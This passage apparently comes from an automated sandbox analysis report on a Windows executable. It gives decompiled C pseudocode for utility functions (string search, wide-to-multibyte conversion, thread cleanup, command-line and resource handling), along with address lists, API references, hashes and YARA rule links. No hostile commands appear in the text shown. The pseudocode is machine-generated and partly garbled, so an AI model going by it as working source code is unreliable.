					_t84 =  &(_t84[0]);
				} while (_t81 != 0);
				_t82 = _t84 - _t86 >> 1;
				goto L5;
			}

0x00405b47
0x00405b4d
0x00405b65
0x00405b67
0x00405b68
0x00405b6d
0x00405b72
0x00405b7f
0x00405b89
0x00405b8b
0x00405b91
0x00405b99
0x00405b99
0x00405b9b
0x00405ba1
0x00405ba9
0x00405ba9
0x00405bab
0x00405bb1
0x00405d14
0x00405d1f
0x00405d28
0x00405d31
0x00405bc1
0x00405bc3
0x00405cfb
0x00405d00
0x00405d00
0x00405d03
0x00405d06
0x00405d0b
0x00405d10
0x00000000
0x00405bd3
0x00405bd3
0x00405bd5
0x00405bd9
0x00405bd9
0x00405be0
0x00405be0
0x00405be3
0x00405be6
0x00405bed
0x00405bf4
0x00405bf8
0x00405c38
0x00405c3c
0x00405c41
0x00405c49
0x00405c4b
0x00405c4b
0x00405c53
0x00405c5a
0x00405c60
0x00405c65
0x00405c69
0x00405c73
0x00405c76
0x00405c76
0x00405c7d
0x00405cc5
0x00405cca
0x00405cd8
0x00405cd8
0x00000000
0x00405c7f
0x00405c7f
0x00405c83
0x00405c86
0x00405c8a
0x00405c8f
0x00405ce3
0x00405ce7
0x00405cea
0x00405cee
0x00000000
0x00405cee
0x00405c91
0x00405c95
0x00405c99
0x00405c9f
0x00000000
0x00000000
0x00405ca1
0x00405ca2
0x00405ca8
0x00000000
0x00000000
0x00405cb4
0x00405cb9
0x00405cbe
0x00405cc1
0x00000000
0x00405cf1
0x00405cf1
0x00000000
0x00405cf7
0x00405c7d
0x00405c0a
0x00405c12
0x00405c16
0x00405c20
0x00405c20
0x00405c23
0x00405c26
0x00405c2b
0x00405c30
0x00000000
0x00405c30
0x00405bc3
0x00405bb1
0x00405b4f
0x00405b51
0x00405b54
0x00405b54
0x00405b57
0x00405b5a
0x00405b61
0x00000000

APIs

HeapAlloc.KERNEL32(00000000,?), ref: 00405C0A
wcsncpy.MSVCRT ref: 00405C60

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeapwcsncpy
String ID:
API String ID: 2304708654-0
Opcode ID: 4400bf17a7ab25ba1853b7dace69af7ef1599cfcf7aa925f7f2e8bfe761e0971
Instruction ID: cb064e81f22c81d64e764a7bfd7558cc4db0c0b6a5bd9f26a61017110445664c
Opcode Fuzzy Hash: 4400bf17a7ab25ba1853b7dace69af7ef1599cfcf7aa925f7f2e8bfe761e0971
Instruction Fuzzy Hash: 2151DE305087059BDB209F28D844A6BB7F4FF84348F544A2EFC45A72D0E778E915CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406610, Relevance: 6.1, APIs: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406610() {
				WCHAR* _t16;
				signed short _t19;
				WCHAR* _t20;
				signed short* _t25;
				signed short _t27;
				signed int _t31;
				signed int _t32;
				signed short* _t33;
				signed short* _t34;
				signed short* _t36;
				signed short* _t42;
				signed short* _t44;
				signed short* _t45;
				signed int _t47;
				WCHAR* _t48;
				void* _t49;

				_t44 =  *(_t49 + 0x24);
				_t16 =  *_t44 & 0x0000ffff;
				_t45 =  &(_t44[1]);
				 *(_t49 + 0x2c) = _t45;
				if(_t16 == 0) {
					return  *(_t49 + 0x28);
				} else {
					_t31 = CharLowerW(_t16) & 0x0000ffff;
					_t33 =  &(_t45[1]);
					 *(_t49 + 0x1c) = _t31;
					do {
						_t19 =  *_t45;
						_t45 =  &(_t45[1]);
					} while (_t19 != 0);
					_t42 =  *(_t49 + 0x28);
					_t47 = _t45 - _t33 >> 1;
					 *(_t49 + 0x18) = _t47;
					while(1) {
						_t20 =  *_t42 & 0x0000ffff;
						_t42 =  &(_t42[1]);
						if(_t20 == 0) {
							break;
						}
						if(CharLowerW(_t20) != _t31) {
							continue;
						} else {
							_t36 =  *(_t49 + 0x2c);
							_t32 = _t47;
							_t34 = _t36;
							if(_t47 == 0) {
								L13:
								return _t42 - 2;
							} else {
								_t25 = _t42 - _t36;
								 *(_t49 + 0x14) = _t25;
								while(1) {
									_t48 =  *(_t25 + _t34) & 0x0000ffff;
									 *(_t49 + 0x14) =  &(_t34[1]);
									_t27 = CharLowerW( *_t34 & 0x0000ffff);
									if((CharLowerW(_t48) & 0x0000ffff) != (_t27 & 0x0000ffff)) {
										break;
									}
									if(_t48 == 0) {
										goto L13;
									} else {
										_t32 = _t32 - 1;
										if(_t32 == 0) {
											goto L13;
										} else {
											_t34 =  *(_t49 + 0x10);
											_t25 =  *(_t49 + 0x14);
											continue;
										}
									}
									goto L16;
								}
								_t47 =  *(_t49 + 0x18);
								_t31 =  *(_t49 + 0x1c);
								continue;
							}
						}
						goto L16;
					}
					return 0;
				}
				L16:
			}

0x00406615
0x0040661b
0x0040661f
0x00406622
0x00406629
0x004066fe
0x0040662f
0x00406638
0x0040663b
0x0040663e
0x00406642
0x00406642
0x00406646
0x00406649
0x0040664e
0x00406654
0x00406656
0x00406660
0x00406660
0x00406663
0x00406669
0x00000000
0x00000000
0x00406675
0x00000000
0x00406677
0x00406677
0x0040667b
0x0040667d
0x00406681
0x004066da
0x004066e6
0x00406683
0x00406685
0x00406687
0x00406690
0x00406690
0x0040669b
0x0040669f
0x004066b0
0x00000000
0x00000000
0x004066b5
0x00000000
0x004066b7
0x004066b7
0x004066b8
0x00000000
0x004066ba
0x004066c0
0x004066c4
0x00000000
0x004066c4
0x004066b8
0x00000000
0x004066b5
0x004066d0
0x004066d4
0x00000000
0x004066d4
0x00406681
0x00000000
0x00406675
0x004066f0
0x004066f0
0x00000000

APIs

CharLowerW.USER32 ref: 00406636
CharLowerW.USER32(00000000), ref: 00406670
CharLowerW.USER32(?), ref: 0040669F
CharLowerW.USER32(?), ref: 004066A5

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
Instruction ID: 85927fc96f9716e1d1e6d5b1ddc4ac0db90fb70db8c0b3b43891102a4ed5054c
Opcode Fuzzy Hash: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
Instruction Fuzzy Hash: 3A215775A043198BC710EF59A840477B7E4EB80761F46087AFC85A3380D63AEE199BB9

Uniqueness

Uniqueness Score: -1.00%

Function 00411E80, Relevance: 6.1, APIs: 4, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411E80(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t2 =  &(_t13[1]); // 0x2
					_t17 = _t2;
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t3 = (_t13 - _t17 >> 1) + 1; // -1
					_t20 = _t3;
					_t12 = WideCharToMultiByte(0xfde9, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0xfde9, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}

0x00411e83
0x00411e8a
0x00411ef4
0x00411ef6
0x00411efe
0x00411f05
0x00411e8c
0x00411e8c
0x00411e8e
0x00411e8e
0x00411e91
0x00411e91
0x00411e94
0x00411e97
0x00411ea8
0x00411ea8
0x00411eba
0x00411ebe
0x00000000
0x00411ec0
0x00411ec0
0x00411ec9
0x00411ecb
0x00411ed0
0x00000000
0x00411ed2
0x00411ee7
0x00411ef1
0x00411ef1
0x00411ed0
0x00411ebe

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D058,00000000), ref: 00411EB4
malloc.MSVCRT ref: 00411EC4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411EE1
malloc.MSVCRT ref: 00411EF6

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
Instruction ID: da1f4c5307a9808d3c7f8614f95932c7effa64efca2e052dfed00f08d58b5d3d
Opcode Fuzzy Hash: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
Instruction Fuzzy Hash: FE012E3734030227E32066A6AC02FE77B49CB85B95F19407AFF005E2C1CAA3A8008A79

Uniqueness

Uniqueness Score: -1.00%

Function 00411F20, Relevance: 6.1, APIs: 4, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411F20(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t17 =  &(_t13[1]);
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t20 = (_t13 - _t17 >> 1) + 1;
					_t12 = WideCharToMultiByte(0, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}

0x00411f23
0x00411f2a
0x00411f8e
0x00411f90
0x00411f98
0x00411f9f
0x00411f2c
0x00411f2c
0x00411f2e
0x00411f31
0x00411f31
0x00411f34
0x00411f37
0x00411f48
0x00411f57
0x00411f5b
0x00000000
0x00411f5d
0x00411f5d
0x00411f66
0x00411f68
0x00411f6d
0x00000000
0x00411f6f
0x00411f81
0x00411f8b
0x00411f8b
0x00411f6d
0x00411f5b

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F51
malloc.MSVCRT ref: 00411F61
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F7B
malloc.MSVCRT ref: 00411F90

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
Instruction ID: 2143df0fa8f9e7073c9e362d0ea50869445b156f554053f4d5fb65981249776a
Opcode Fuzzy Hash: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
Instruction Fuzzy Hash: AE01643738030037E3204A95AC02FA77B4DCBC5B95F19407AFB005E2C6CBB3A8018AB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A90C, Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32(00000000,02799B50,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A8BB,00000000,00000000,00000104,?), ref: 0040A91E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A92F
wcslen.MSVCRT ref: 0040A93A
CoTaskMemFree.OLE32(00000000,?,00000104,0040A8BB,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A958

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 1d539ddef34536a218538a68ec0bd755f4d96d5f82a4622414e5c8c43dda79cb
Instruction ID: e8765f26a12464aff5057ee3a7a78408a7749531e725ecdfcc70520e35881baf
Opcode Fuzzy Hash: 1d539ddef34536a218538a68ec0bd755f4d96d5f82a4622414e5c8c43dda79cb
Instruction Fuzzy Hash: 70F08136600615BBC7206F66DC0AEAB7F78EF16660B424136F805E6250E7319920C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(intOrPtr _a4) {
				int _t4;
				intOrPtr _t9;
				intOrPtr* _t10;

				_t9 = _a4;
				_t4 = TerminateThread(E004053EA(_t9), 0);
				EnterCriticalSection(0x4176a0);
				_t10 =  *0x4170bc; // 0x0
				while(_t10 != 0) {
					if( *((intOrPtr*)(_t10 + 0xc)) == _t9) {
						_t11 = _t10 + 8;
						CloseHandle( *(_t10 + 8));
						_t4 = E0040DAD2(0x4170bc, _t11);
					} else {
						_t10 =  *_t10;
						continue;
					}
					L6:
					LeaveCriticalSection(0x4176a0);
					return _t4;
				}
				goto L6;
			}

0x00405439
0x00405446
0x00405452
0x00405458
0x00405467
0x00405463
0x0040546d
0x00405472
0x0040547e
0x00405465
0x00405465
0x00000000
0x00405465
0x00405485
0x00405486
0x0040548f
0x0040548f
0x00000000

APIs

Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004176A0,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004176A0,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
EnterCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472

Part of subcall function 0040DAD2: HeapFree.KERNEL32(00000000,-00000008,0040D3EB,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB0B

LeaveCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: 66861cca315dffbfe371a5ba103c1e5b91a8d79734cb270ef81e9151ba7a87fc
Instruction ID: e82d31de5584acb3c1822b09e6e690cbeb5bd259d621742d6e77904c892493b9
Opcode Fuzzy Hash: 66861cca315dffbfe371a5ba103c1e5b91a8d79734cb270ef81e9151ba7a87fc
Instruction Fuzzy Hash: D4F0BE36904710EBC2205F60AC48BEB7B68EB44763726843BF80273190C738AC808E6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403001, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405E50: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405EA1

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040DEBC

Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5

Part of subcall function 004092F5: CoInitialize.OLE32(00000000), ref: 00409313
Part of subcall function 004092F5: memset.MSVCRT ref: 00409321
Part of subcall function 004092F5: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
Part of subcall function 004092F5: wcsncpy.MSVCRT ref: 0040937D
Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409391
Part of subcall function 004092F5: CoTaskMemFree.OLE32(?), ref: 0040941A
Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409421
Part of subcall function 004092F5: FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440

Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07

PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02798AF0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231

Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44

Strings

`A, xrefs: 004030CC

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUppermemsetwcsncpy
String ID: `A
API String ID: 2009453447-2737472851
Opcode ID: 95adbcaa2ab5ee70eb3dc5b94c51e17671b79cd70e6355162ca6a04cdaa6e4f4
Instruction ID: e0b9ffac2fcbd3cac9e210611f46d13d34f6da227652cecd82e9aee9d1240e54
Opcode Fuzzy Hash: 95adbcaa2ab5ee70eb3dc5b94c51e17671b79cd70e6355162ca6a04cdaa6e4f4
Instruction Fuzzy Hash: 2551C4B9A04B047EE500BBF2DD82E7F666EDAD4718B10983FB440BD0D2C93C9D49666D

Uniqueness

Uniqueness Score: -1.00%

Function 004024F1, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004024F1(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a36) {
				char _v0;
				signed int _v4;
				char _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				char _v20;
				void* _t31;
				void* _t32;
				void* _t37;
				WCHAR* _t41;
				void* _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				char* _t66;
				void* _t68;
				void* _t69;
				void* _t73;
				char _t84;
				void* _t85;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				intOrPtr* _t103;

				_t102 = __esi;
				_t84 = 9;
				do {
					_t103 = _t103 - 4;
					_v8 = 0;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				E004051A0(E0040DF60(), _a36);
				 *0x41702c = 0x4160d0;
				_v12 = 0;
				while(1) {
					_t106 = 6 - _v8;
					if(6 < _v8) {
						break;
					}
					_t66 =  *0x41702c; // 0x41609a
					_v4 =  *_t66;
					 *0x41702c =  *0x41702c + 1;
					_t68 = E0040DE20();
					_t98 = _t84;
					_push(_t68);
					_push(_t98);
					_t69 = E0040DE20();
					E00405D60(_t106, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t69);
					_push(_v12);
					_t73 = E0040DE20();
					_pop(_t101);
					E0040DFC0(_t101);
					_t84 = _v20;
					E0040DFC0(_t84);
					E0040DE60( &_v20, _t73);
					 *_t103 =  *_t103 + 1;
					if( *_t103 >= 0) {
						continue;
					}
					break;
				}
				_t31 = E0040DE20();
				_t85 = _t84;
				_push(_t31);
				_t32 = E0040DE20();
				E00409B60(GetCommandLineW(), _t32);
				E0040DE60( &_v0, _t85);
				_push(_v8);
				_t37 = E0040DE20();
				_pop(_t88);
				E0040DFC0(_t88);
				E0040DE60( &_v8, _t37);
				_t41 = _v16;
				PathRemoveArgsW(_t41);
				_v12 = _t41;
				_v12 = E00405D80(_v16);
				if(_v12 > 0) {
					_push(_t88);
					_push(E0040DE20());
					E0040DFC0(0x416026);
					_t56 = E0040DE20();
					_t94 = 0x416026;
					_push(_t56);
					_t57 = E0040DE20();
					_t95 = _t94;
					_push(_t57);
					_t58 = E0040DE20();
					_t96 = _t95;
					_push(_t58);
					_t59 = E0040DE20();
					_t97 = _t96;
					E00405182(E004060B0(_t102, _a4, _a16 + 1, _t59));
					 *_t103 =  *_t103 + _t97;
					E00406000();
					_push( &_v0);
					E0040DE60();
				}
				E00409860(_a4, _a24);
				_push(_a16);
				_t44 = E0040DE20();
				_pop(_t90);
				E0040DFC0(_t90);
				_t46 = _t44;
				_t47 = E00405170();
				_t91 = _t46;
				_t48 = _t47 + _t91;
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t48, _a12), _v4), _v0), _v8), _a8);
			}

0x004024f1
0x004024f2
0x004024f7
0x004024f7
0x004024fa
0x00402501
0x00402501
0x0040250d
0x00402517
0x0040251c
0x00402525
0x0040252a
0x0040252d
0x00000000
0x00000000
0x0040252f
0x00402537
0x0040253b
0x00402542
0x00402547
0x00402548
0x00402549
0x0040254a
0x00402559
0x00402563
0x0040256c
0x0040256d
0x00402572
0x00402575
0x0040257a
0x0040257f
0x00402589
0x0040258e
0x00402591
0x00000000
0x00000000
0x00000000
0x00402591
0x00402594
0x00402599
0x0040259a
0x0040259c
0x004025a9
0x004025b3
0x004025bc
0x004025bd
0x004025c2
0x004025c5
0x004025cf
0x004025d4
0x004025d9
0x004025de
0x004025eb
0x004025f5
0x004025f7
0x004025fe
0x00402605
0x0040260b
0x00402610
0x00402611
0x00402613
0x00402618
0x00402619
0x0040261b
0x00402620
0x00402621
0x00402623
0x00402628
0x00402639
0x0040263e
0x00402641
0x0040264b
0x0040264c
0x0040264c
0x00402659
0x00402662
0x00402663
0x00402668
0x0040266b
0x00402670
0x00402672
0x00402677
0x00402678
0x004026b7

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
PathRemoveArgsW.SHLWAPI(?), ref: 004025D9

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Part of subcall function 00409860: SetEnvironmentVariableW.KERNELBASE(02799B50,02799B50,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DEF0: HeapFree.KERNEL32(02790000,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08

Strings

&`A, xrefs: 004025FF

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
String ID: &`A
API String ID: 1199808876-2812803553
Opcode ID: 3a8b2930490a16416bc5211f3a970ff8349e94485dee32ac6e367cc93453338b
Instruction ID: f63cb6ba6756906bb1a885948d3e935d11b840abb1ca4822bfa7626acd848ba7
Opcode Fuzzy Hash: 3a8b2930490a16416bc5211f3a970ff8349e94485dee32ac6e367cc93453338b
Instruction Fuzzy Hash: 0341EEB59047016ED600BBB2DD8193F77ADEBD4718F10983FB040AA1D2CA3CD8595A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004096DA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004096DA(void* __eflags, WCHAR* _a4) {
				signed int* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				WCHAR* _t11;
				signed int _t14;
				signed int _t15;
				WCHAR* _t17;
				signed int _t18;
				void* _t21;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				WCHAR* _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				signed int* _t31;
				WCHAR* _t32;

				E0040D288( *0x4176c4);
				_t15 = _t14 | 0xffffffff;
				_t32 = 0;
				_t11 = GetCommandLineW();
				_t31 = _v0;
				_t24 =  *_t11 & 0x0000ffff;
				if(_t24 == 0) {
					L30:
					if(_t31 != 0) {
						L34:
						 *_t31 = 0;
						return _t11;
					}
					return _t15;
				}
				_t17 = _a4;
				_v8 = 0x20;
				_v4 = 0x22;
